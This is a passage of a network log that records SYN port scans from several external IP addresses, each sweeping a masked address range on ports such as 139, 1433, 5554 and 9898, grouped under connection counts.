13:36:34 4.47.246.208:62845 -> xxx.yyy.1.2:139 SYN ******S* Jul 3 13:36:34 4.47.246.208:62497 -> xxx.yyy.1.3:139 SYN ******S* Jul 3 13:36:34 4.47.246.208:62831 -> xxx.yyy.1.4:139 SYN ******S* Jul 3 13:36:34 4.47.246.208:62499 -> xxx.yyy.1.5:139 SYN ******S* Jul 3 13:36:34 4.47.246.208:62814 -> xxx.yyy.1.6:139 SYN ******S* Jul 3 13:36:34 4.47.246.208:62501 -> xxx.yyy.1.7:139 SYN ******S* [...] Jul 3 13:59:28 4.47.246.208:64034 -> xxx.yyy.255.150:139 SYN ******S* Jul 3 13:59:28 4.47.246.208:64038 -> xxx.yyy.255.153:139 SYN ******S* Jul 3 13:59:28 4.47.246.208:60133 -> xxx.yyy.255.156:139 SYN ******S* Jul 3 13:59:28 4.47.246.208:60080 -> xxx.yyy.255.174:139 SYN ******S* Jul 3 13:59:28 4.47.246.208:60137 -> xxx.yyy.255.177:139 SYN ******S* Jul 3 13:59:28 4.47.246.208:60140 -> xxx.yyy.255.187:139 SYN ******S* Jul 3 13:59:28 4.47.246.208:64063 -> xxx.yyy.255.198:139 SYN ******S* Jul 3 13:59:28 4.47.246.208:64079 -> xxx.yyy.255.207:139 SYN ******S* 94289 Jul 3 11:58:25 69.144.235.170:1921 -> xxx.yyy.1.59:139 SYN ******S* Jul 3 11:58:25 69.144.235.170:1932 -> xxx.yyy.1.63:139 SYN ******S* Jul 3 11:58:25 69.144.235.170:1930 -> xxx.yyy.1.62:139 SYN ******S* Jul 3 11:58:25 69.144.235.170:1934 -> xxx.yyy.1.64:139 SYN ******S* Jul 3 11:58:25 69.144.235.170:1936 -> xxx.yyy.1.65:139 SYN ******S* Jul 3 11:58:22 69.144.235.170:1954 -> xxx.yyy.1.74:139 SYN ******S* Jul 3 11:58:25 69.144.235.170:1956 -> xxx.yyy.1.75:139 SYN ******S* Jul 3 11:58:25 69.144.235.170:1984 -> xxx.yyy.1.86:139 SYN ******S* [...] Jul 3 15:46:57 69.144.235.170:2615 -> xxx.yyy.255.245:139 SYN ******S* Jul 3 15:46:57 69.144.235.170:2616 -> xxx.yyy.255.246:139 SYN ******S* Jul 3 15:46:57 69.144.235.170:2618 -> xxx.yyy.255.247:139 SYN ******S* Jul 3 15:46:57 69.144.235.170:2621 -> xxx.yyy.255.248:139 SYN ******S* Jul 3 15:46:57 69.144.235.170:2622 -> xxx.yyy.255.249:139 SYN ******S* Jul 3 15:46:57 69.144.235.170:2624 -> xxx.yyy.255.250:139 SYN ******S* Jul 3 15:46:58 69.144.235.170:2625 -> xxx.yyy.255.251:139 SYN ******S* Jul 3 15:46:58 69.144.235.170:2630 -> xxx.yyy.255.252:139 SYN ******S* Jul 3 15:46:58 69.144.235.170:2636 -> xxx.yyy.255.254:139 SYN ******S* 78403 Jul 3 11:09:42 216.74.15.170:2713 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 11:09:42 216.74.15.170:2715 -> xxx.yyy.1.3:1433 SYN ******S* Jul 3 11:09:42 216.74.15.170:2716 -> xxx.yyy.1.1:1433 SYN ******S* Jul 3 11:09:42 216.74.15.170:2718 -> xxx.yyy.1.5:1433 SYN ******S* Jul 3 11:09:42 216.74.15.170:2717 -> xxx.yyy.1.4:1433 SYN ******S* Jul 3 11:09:42 216.74.15.170:2719 -> xxx.yyy.1.6:1433 SYN ******S* Jul 3 11:09:42 216.74.15.170:2720 -> xxx.yyy.1.7:1433 SYN ******S* Jul 3 11:09:42 216.74.15.170:2721 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 3 11:47:42 216.74.15.170:1685 -> xxx.yyy.255.246:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1681 -> xxx.yyy.255.243:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1683 -> xxx.yyy.255.245:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1686 -> xxx.yyy.255.248:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1688 -> xxx.yyy.255.250:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1690 -> xxx.yyy.255.252:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1692 -> xxx.yyy.255.254:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1689 -> xxx.yyy.255.251:1433 SYN ******S* Jul 3 11:47:42 216.74.15.170:1691 -> xxx.yyy.255.253:1433 SYN ******S* 75585 Jul 3 04:35:00 4.23.173.111:3853 -> xxx.yyy.1.1:1433 SYN ******S* Jul 3 04:35:03 4.23.173.111:3854 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 04:35:03 4.23.173.111:3855 -> xxx.yyy.1.3:1433 SYN ******S* Jul 3 04:35:03 4.23.173.111:3856 -> xxx.yyy.1.4:1433 SYN ******S* Jul 3 04:35:03 4.23.173.111:3857 -> xxx.yyy.1.5:1433 SYN ******S* Jul 3 04:35:03 4.23.173.111:3858 -> xxx.yyy.1.6:1433 SYN ******S* Jul 3 04:35:03 4.23.173.111:3859 -> xxx.yyy.1.7:1433 SYN ******S* Jul 3 04:35:03 4.23.173.111:3860 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 3 04:46:17 4.23.173.111:2453 -> xxx.yyy.255.235:1433 SYN ******S* Jul 3 04:46:18 4.23.173.111:2472 -> xxx.yyy.255.254:1433 SYN ******S* Jul 3 04:46:18 4.23.173.111:2469 -> xxx.yyy.255.251:1433 SYN ******S* Jul 3 04:46:18 4.23.173.111:2466 -> xxx.yyy.255.248:1433 SYN ******S* Jul 3 04:46:18 4.23.173.111:2470 -> xxx.yyy.255.252:1433 SYN ******S* Jul 3 04:46:18 4.23.173.111:2467 -> xxx.yyy.255.249:1433 SYN ******S* Jul 3 04:46:18 4.23.173.111:2471 -> xxx.yyy.255.253:1433 SYN ******S* Jul 3 04:46:18 4.23.173.111:2468 -> xxx.yyy.255.250:1433 SYN ******S* 74630 Jul 3 02:16:45 140.114.210.90:4775 -> xxx.yyy.1.1:4000 SYN ******S* Jul 3 02:16:45 140.114.210.90:4892 -> xxx.yyy.1.2:4000 SYN ******S* Jul 3 02:16:45 140.114.210.90:1026 -> xxx.yyy.1.3:4000 SYN ******S* Jul 3 02:16:47 140.114.210.90:1027 -> xxx.yyy.1.4:4000 SYN ******S* Jul 3 02:16:47 140.114.210.90:1028 -> xxx.yyy.1.5:4000 SYN ******S* Jul 3 02:16:47 140.114.210.90:1029 -> xxx.yyy.1.6:4000 SYN ******S* Jul 3 02:16:47 140.114.210.90:1030 -> xxx.yyy.1.7:4000 SYN ******S* Jul 3 02:16:47 140.114.210.90:1031 -> xxx.yyy.1.8:4000 SYN ******S* [...] Jul 3 02:28:28 140.114.210.90:3467 -> xxx.yyy.255.251:4000 SYN ******S* Jul 3 02:28:28 140.114.210.90:3469 -> xxx.yyy.255.253:4000 SYN ******S* Jul 3 02:28:28 140.114.210.90:3462 -> xxx.yyy.255.246:4000 SYN ******S* Jul 3 02:28:28 140.114.210.90:3463 -> xxx.yyy.255.247:4000 SYN ******S* Jul 3 02:28:28 140.114.210.90:3465 -> xxx.yyy.255.249:4000 SYN ******S* Jul 3 02:28:28 140.114.210.90:3466 -> xxx.yyy.255.250:4000 SYN ******S* Jul 3 02:28:28 140.114.210.90:3468 -> xxx.yyy.255.252:4000 SYN ******S* Jul 3 02:28:28 140.114.210.90:3470 -> xxx.yyy.255.254:4000 SYN ******S* 73748 Jul 3 21:19:45 212.240.38.132:4144 -> xxx.yyy.1.1:5554 SYN ******S* Jul 3 21:19:45 212.240.38.132:4145 -> xxx.yyy.1.2:5554 SYN ******S* Jul 3 21:19:45 212.240.38.132:4146 -> xxx.yyy.1.3:5554 SYN ******S* Jul 3 21:19:44 212.240.38.132:4147 -> xxx.yyy.1.4:5554 SYN ******S* Jul 3 21:19:47 212.240.38.132:4148 -> xxx.yyy.1.5:5554 SYN ******S* Jul 3 21:19:47 212.240.38.132:4149 -> xxx.yyy.1.6:5554 SYN ******S* Jul 3 21:19:47 212.240.38.132:4150 -> xxx.yyy.1.7:5554 SYN ******S* Jul 3 21:19:47 212.240.38.132:4151 -> xxx.yyy.1.8:5554 SYN ******S* [...] Jul 3 21:30:43 212.240.38.132:3106 -> xxx.yyy.255.246:5554 SYN ******S* Jul 3 21:30:43 212.240.38.132:3110 -> xxx.yyy.255.250:5554 SYN ******S* Jul 3 21:30:43 212.240.38.132:3107 -> xxx.yyy.255.247:5554 SYN ******S* Jul 3 21:30:43 212.240.38.132:3104 -> xxx.yyy.255.244:5554 SYN ******S* Jul 3 21:30:43 212.240.38.132:3111 -> xxx.yyy.255.251:5554 SYN ******S* Jul 3 21:30:43 212.240.38.132:3108 -> xxx.yyy.255.248:5554 SYN ******S* Jul 3 21:30:43 212.240.38.132:3105 -> xxx.yyy.255.245:5554 SYN ******S* Jul 3 21:30:43 212.240.38.132:3114 -> xxx.yyy.255.254:5554 SYN ******S* 73575 Jul 3 10:50:29 83.130.151.105:2179 -> xxx.yyy.1.1:8000 SYN ******S* Jul 3 10:50:29 83.130.151.105:2180 -> xxx.yyy.1.2:8000 SYN ******S* Jul 3 10:50:30 83.130.151.105:2182 -> xxx.yyy.1.3:8000 SYN ******S* Jul 3 10:50:31 83.130.151.105:2183 -> xxx.yyy.1.4:8000 SYN ******S* Jul 3 10:50:31 83.130.151.105:2184 -> xxx.yyy.1.5:8000 SYN ******S* Jul 3 10:50:31 83.130.151.105:2185 -> xxx.yyy.1.6:8000 SYN ******S* Jul 3 10:50:31 83.130.151.105:2186 -> xxx.yyy.1.7:8000 SYN ******S* Jul 3 10:50:31 83.130.151.105:2187 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 3 11:05:02 83.130.151.105:2109 -> xxx.yyy.255.246:8000 SYN ******S* Jul 3 11:05:02 83.130.151.105:2110 -> xxx.yyy.255.247:8000 SYN ******S* Jul 3 11:05:02 83.130.151.105:2111 -> xxx.yyy.255.248:8000 SYN ******S* Jul 3 11:05:02 83.130.151.105:2112 -> xxx.yyy.255.249:8000 SYN ******S* Jul 3 11:05:02 83.130.151.105:2113 -> xxx.yyy.255.250:8000 SYN ******S* Jul 3 11:05:02 83.130.151.105:2114 -> xxx.yyy.255.251:8000 SYN ******S* Jul 3 11:05:02 83.130.151.105:2115 -> xxx.yyy.255.252:8000 SYN ******S* Jul 3 11:05:02 83.130.151.105:2116 -> xxx.yyy.255.253:8000 SYN ******S* 71820 Jul 3 14:07:38 138.130.219.4:3117 -> xxx.yyy.1.1:1433 SYN ******S* Jul 3 14:07:38 138.130.219.4:3118 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 14:07:38 138.130.219.4:3119 -> xxx.yyy.1.3:1433 SYN ******S* Jul 3 14:07:38 138.130.219.4:3120 -> xxx.yyy.1.4:1433 SYN ******S* Jul 3 14:07:38 138.130.219.4:3121 -> xxx.yyy.1.5:1433 SYN ******S* Jul 3 14:07:38 138.130.219.4:3122 -> xxx.yyy.1.6:1433 SYN ******S* Jul 3 14:07:35 138.130.219.4:3123 -> xxx.yyy.1.7:1433 SYN ******S* Jul 3 14:07:38 138.130.219.4:3124 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 3 14:19:18 138.130.219.4:3315 -> xxx.yyy.255.198:1433 SYN ******S* Jul 3 14:19:18 138.130.219.4:3329 -> xxx.yyy.255.212:1433 SYN ******S* Jul 3 14:19:18 138.130.219.4:3326 -> xxx.yyy.255.209:1433 SYN ******S* Jul 3 14:19:18 138.130.219.4:3325 -> xxx.yyy.255.208:1433 SYN ******S* Jul 3 14:19:18 138.130.219.4:3327 -> xxx.yyy.255.210:1433 SYN ******S* Jul 3 14:19:18 138.130.219.4:3331 -> xxx.yyy.255.214:1433 SYN ******S* Jul 3 14:19:18 138.130.219.4:3328 -> xxx.yyy.255.211:1433 SYN ******S* Jul 3 14:19:19 138.130.219.4:3336 -> xxx.yyy.255.218:1433 SYN ******S* Jul 3 14:19:19 138.130.219.4:3335 -> xxx.yyy.255.217:1433 SYN ******S* 71758 Jul 3 23:05:00 207.81.156.132:2991 -> xxx.yyy.1.1:1433 SYN ******S* Jul 3 23:05:00 207.81.156.132:2993 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 23:05:00 207.81.156.132:2995 -> xxx.yyy.1.3:1433 SYN ******S* Jul 3 23:05:00 207.81.156.132:2997 -> xxx.yyy.1.4:1433 SYN ******S* Jul 3 23:04:57 207.81.156.132:3006 -> xxx.yyy.1.8:1433 SYN ******S* Jul 3 23:04:57 207.81.156.132:3007 -> xxx.yyy.1.9:1433 SYN ******S* Jul 3 23:05:00 207.81.156.132:3009 -> xxx.yyy.1.10:1433 SYN ******S* Jul 3 23:05:00 207.81.156.132:3011 -> xxx.yyy.1.11:1433 SYN ******S* [...] Jul 3 23:16:40 207.81.156.132:3270 -> xxx.yyy.255.242:1433 SYN ******S* Jul 3 23:16:40 207.81.156.132:3282 -> xxx.yyy.255.248:1433 SYN ******S* Jul 3 23:16:40 207.81.156.132:3288 -> xxx.yyy.255.251:1433 SYN ******S* Jul 3 23:16:40 207.81.156.132:3278 -> xxx.yyy.255.246:1433 SYN ******S* Jul 3 23:16:40 207.81.156.132:3284 -> xxx.yyy.255.249:1433 SYN ******S* Jul 3 23:16:40 207.81.156.132:3290 -> xxx.yyy.255.252:1433 SYN ******S* Jul 3 23:16:40 207.81.156.132:3280 -> xxx.yyy.255.247:1433 SYN ******S* Jul 3 23:16:40 207.81.156.132:3286 -> xxx.yyy.255.250:1433 SYN ******S* 71270 Jul 3 20:36:44 217.79.87.60:3346 -> xxx.yyy.1.27:446 SYN ******S* Jul 3 20:36:44 217.79.87.60:3353 -> xxx.yyy.1.28:446 SYN ******S* Jul 3 20:36:45 217.79.87.60:3360 -> xxx.yyy.1.29:446 SYN ******S* Jul 3 20:36:44 217.79.87.60:3368 -> xxx.yyy.1.30:446 SYN ******S* Jul 3 20:36:45 217.79.87.60:3380 -> xxx.yyy.1.31:446 SYN ******S* Jul 3 20:36:44 217.79.87.60:3389 -> xxx.yyy.1.32:446 SYN ******S* Jul 3 20:36:44 217.79.87.60:3394 -> xxx.yyy.1.33:446 SYN ******S* Jul 3 20:36:44 217.79.87.60:3403 -> xxx.yyy.1.40:446 SYN ******S* [...] Jul 3 20:45:12 217.79.87.60:1071 -> xxx.yyy.255.219:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1067 -> xxx.yyy.255.218:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1063 -> xxx.yyy.255.217:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1060 -> xxx.yyy.255.216:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1056 -> xxx.yyy.255.215:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1078 -> xxx.yyy.255.229:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1075 -> xxx.yyy.255.228:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1081 -> xxx.yyy.255.244:3410 SYN ******S* 60175 Jul 3 13:38:26 82.255.170.95:3033 -> xxx.yyy.1.9:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3035 -> xxx.yyy.1.10:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3037 -> xxx.yyy.1.12:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3039 -> xxx.yyy.1.13:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3041 -> xxx.yyy.1.14:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:4714 -> xxx.yyy.1.15:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3045 -> xxx.yyy.1.17:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3047 -> xxx.yyy.1.18:21 SYN ******S* [...] Jul 3 14:50:25 82.255.170.95:3778 -> xxx.yyy.255.225:21 SYN ******S* Jul 3 14:50:25 82.255.170.95:3781 -> xxx.yyy.255.253:21 SYN ******S* Jul 3 14:50:26 82.255.170.95:3877 -> xxx.yyy.255.248:21 SYN ******S* Jul 3 14:50:27 82.255.170.95:3810 -> xxx.yyy.255.250:21 SYN ******S* Jul 3 14:50:28 82.255.170.95:3728 -> xxx.yyy.255.249:21 SYN ******S* Jul 3 14:50:31 82.255.170.95:3778 -> xxx.yyy.255.225:21 SYN ******S* Jul 3 14:50:31 82.255.170.95:3781 -> xxx.yyy.255.253:21 SYN ******S* Jul 3 14:50:32 82.255.170.95:3798 -> xxx.yyy.255.239:21 SYN ******S* Jul 3 14:50:32 82.255.170.95:3802 -> xxx.yyy.255.242:21 SYN ******S* 59817 Jul 3 02:49:40 202.2.80.122:2741 -> xxx.yyy.1.1:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2744 -> xxx.yyy.1.4:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2743 -> xxx.yyy.1.3:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2740 -> xxx.yyy.1.0:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2742 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 02:49:41 202.2.80.122:2745 -> xxx.yyy.1.5:1433 SYN ******S* Jul 3 02:49:41 202.2.80.122:2748 -> xxx.yyy.1.8:1433 SYN ******S* Jul 3 02:49:41 202.2.80.122:2749 -> xxx.yyy.1.9:1433 SYN ******S* [...] Jul 3 02:55:57 202.2.80.122:2754 -> xxx.yyy.255.244:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2705 -> xxx.yyy.255.245:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2709 -> xxx.yyy.255.249:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2710 -> xxx.yyy.255.250:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2713 -> xxx.yyy.255.253:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2712 -> xxx.yyy.255.252:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2714 -> xxx.yyy.255.254:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2711 -> xxx.yyy.255.251:1433 SYN ******S* 44145 Jul 3 21:29:58 221.116.253.130:1085 -> xxx.yyy.1.0:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1087 -> xxx.yyy.1.2:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1088 -> xxx.yyy.1.3:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1099 -> xxx.yyy.1.14:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1089 -> xxx.yyy.1.4:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1092 -> xxx.yyy.1.7:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1091 -> xxx.yyy.1.6:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1094 -> xxx.yyy.1.9:111 SYN ******S* [...] Jul 3 21:33:16 221.116.253.130:2497 -> xxx.yyy.255.242:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2498 -> xxx.yyy.255.243:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2487 -> xxx.yyy.255.232:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2489 -> xxx.yyy.255.234:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2499 -> xxx.yyy.255.244:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2501 -> xxx.yyy.255.246:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2494 -> xxx.yyy.255.239:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2492 -> xxx.yyy.255.237:111 SYN ******S* 38078 Jul 3 02:52:34 218.4.138.212:4859 -> xxx.yyy.1.2:6129 SYN ******S* Jul 3 02:52:31 218.4.138.212:4860 -> xxx.yyy.1.3:6129 SYN ******S* Jul 3 02:52:31 218.4.138.212:4861 -> xxx.yyy.1.4:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4858 -> xxx.yyy.1.1:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4869 -> xxx.yyy.1.12:6129 SYN ******S* Jul 3 02:52:31 218.4.138.212:4863 -> xxx.yyy.1.6:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4864 -> xxx.yyy.1.7:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4875 -> xxx.yyy.1.18:6129 SYN ******S* [...] Jul 3 03:02:43 218.4.138.212:4266 -> xxx.yyy.236.62:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4277 -> xxx.yyy.236.73:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4272 -> xxx.yyy.236.68:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4274 -> xxx.yyy.236.70:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4270 -> xxx.yyy.236.66:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4286 -> xxx.yyy.236.82:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4283 -> xxx.yyy.236.79:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4293 -> xxx.yyy.236.89:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4294 -> xxx.yyy.236.90:6129 SYN ******S* 35324 Jul 3 05:15:58 128.82.8.161:4375 -> xxx.yyy.1.1:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4376 -> xxx.yyy.1.2:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4377 -> xxx.yyy.1.3:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4378 -> xxx.yyy.1.4:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4379 -> xxx.yyy.1.5:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4380 -> xxx.yyy.1.6:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4381 -> xxx.yyy.1.7:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4382 -> xxx.yyy.1.8:4000 SYN ******S* [...] Jul 3 05:27:00 128.82.8.161:4351 -> xxx.yyy.255.247:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4352 -> xxx.yyy.255.248:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4353 -> xxx.yyy.255.249:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4354 -> xxx.yyy.255.250:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4355 -> xxx.yyy.255.251:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4356 -> xxx.yyy.255.252:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4357 -> xxx.yyy.255.253:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4358 -> xxx.yyy.255.254:4000 SYN ******S* 31206 Jul 3 15:57:27 68.78.72.190:4258 -> xxx.yyy.134.190:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4260 -> xxx.yyy.134.191:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4261 -> xxx.yyy.134.192:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4262 -> xxx.yyy.134.193:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4263 -> xxx.yyy.134.194:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4264 -> xxx.yyy.134.195:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4266 -> xxx.yyy.134.196:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4267 -> xxx.yyy.134.197:1433 SYN ******S* [...] Jul 3 16:17:47 68.78.72.190:3629 -> xxx.yyy.157.45:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3630 -> xxx.yyy.157.46:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3631 -> xxx.yyy.157.47:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3632 -> xxx.yyy.157.48:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3633 -> xxx.yyy.157.49:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3634 -> xxx.yyy.157.50:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3635 -> xxx.yyy.157.51:1433 SYN ******S* Jul 3 16:17:48 68.78.72.190:3636 -> xxx.yyy.157.52:1433 SYN ******S* Jul 3 16:17:48 68.78.72.190:3608 -> xxx.yyy.157.24:1433 SYN ******S* 15514 Jul 3 23:56:32 220.220.173.152:1504 -> xxx.yyy.174.2:5554 SYN ******S* Jul 3 23:56:33 220.220.173.152:1719 -> xxx.yyy.174.2:1023 SYN ******S* Jul 3 23:56:35 220.220.173.152:2386 -> xxx.yyy.174.2:9898 SYN ******S* Jul 3 23:56:32 220.220.173.152:1506 -> xxx.yyy.174.3:5554 SYN ******S* Jul 3 23:56:33 220.220.173.152:1721 -> xxx.yyy.174.3:1023 SYN ******S* Jul 3 23:56:35 220.220.173.152:2387 -> xxx.yyy.174.3:9898 SYN ******S* Jul 3 23:56:32 220.220.173.152:1511 -> xxx.yyy.174.5:5554 SYN ******S* Jul 3 23:56:33 220.220.173.152:1732 -> xxx.yyy.174.5:1023 SYN ******S* [...] Jul 3 23:59:35 220.220.173.152:2089 -> xxx.yyy.194.111:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2092 -> xxx.yyy.194.112:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2088 -> xxx.yyy.194.109:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2093 -> xxx.yyy.194.113:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2096 -> xxx.yyy.194.114:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2097 -> xxx.yyy.194.115:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2104 -> xxx.yyy.194.118:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2098 -> xxx.yyy.194.116:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2101 -> xxx.yyy.194.117:9898 SYN ******S* 15397 Jul 3 19:46:13 83.129.127.41:23527 -> xxx.yyy.1.6:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:24451 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:23884 -> xxx.yyy.1.10:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:24479 -> xxx.yyy.1.17:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:26027 -> xxx.yyy.1.13:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:25887 -> xxx.yyy.1.24:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:21754 -> xxx.yyy.1.21:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:23556 -> xxx.yyy.1.29:1433 SYN ******S* [...] Jul 3 19:47:48 83.129.127.41:23415 -> xxx.yyy.255.230:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:24136 -> xxx.yyy.255.226:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:21127 -> xxx.yyy.255.234:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:22792 -> xxx.yyy.255.241:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:24997 -> xxx.yyy.255.237:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:25285 -> xxx.yyy.255.246:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:23203 -> xxx.yyy.255.254:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:23673 -> xxx.yyy.255.250:1433 SYN ******S* 12037 Jul 3 12:25:01 210.202.16.36:4415 -> xxx.yyy.1.1:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:4427 -> xxx.yyy.1.3:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:4454 -> xxx.yyy.1.4:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:1492 -> xxx.yyy.1.9:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:3402 -> xxx.yyy.1.30:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:1492 -> xxx.yyy.1.31:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:3402 -> xxx.yyy.1.32:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:4415 -> xxx.yyy.1.33:17300 SYN ******S* [...] Jul 3 12:29:02 210.202.16.36:4417 -> xxx.yyy.254.72:17300 SYN ******S* Jul 3 12:29:02 210.202.16.36:4427 -> xxx.yyy.254.73:17300 SYN ******S* Jul 3 12:29:02 210.202.16.36:4479 -> xxx.yyy.254.74:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:1800 -> xxx.yyy.254.213:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4251 -> xxx.yyy.254.214:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4753 -> xxx.yyy.254.225:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4850 -> xxx.yyy.254.226:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4617 -> xxx.yyy.254.242:17300 SYN ******S* 10095 Jul 3 00:56:33 221.202.66.25:3724 -> xxx.yyy.72.161:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4473 -> xxx.yyy.72.161:1023 SYN ******S* Jul 3 00:56:33 221.202.66.25:3761 -> xxx.yyy.72.160:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4636 -> xxx.yyy.72.160:1023 SYN ******S* Jul 3 00:56:33 221.202.66.25:3765 -> xxx.yyy.72.159:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4632 -> xxx.yyy.72.159:1023 SYN ******S* Jul 3 00:56:33 221.202.66.25:3767 -> xxx.yyy.72.158:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4630 -> xxx.yyy.72.158:1023 SYN ******S* [...] Jul 3 00:57:23 221.202.66.25:4160 -> xxx.yyy.92.228:9898 